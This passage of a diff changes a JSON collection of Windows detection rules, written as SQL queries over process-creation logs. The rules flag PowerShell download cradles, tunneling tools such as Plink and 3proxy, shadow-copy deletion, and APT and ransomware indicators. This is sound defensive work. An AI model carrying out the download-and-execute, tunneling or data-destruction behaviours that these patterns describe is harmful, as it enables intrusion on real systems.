ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. 
used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": 
"e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Administrative scripts." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE 
'%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "status": "experimental", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": 
"proc_creation_win_plink_port_forwarding.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "status": "experimental", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate scripts located on other partitions such as \"D:\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "PUA - 3Proxy Execution", + "id": 
"f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Remote 
Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1219" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' 
OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.g0069" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND 
CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - 
"status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "status": "test", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\' OR CommandLine LIKE 
'%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 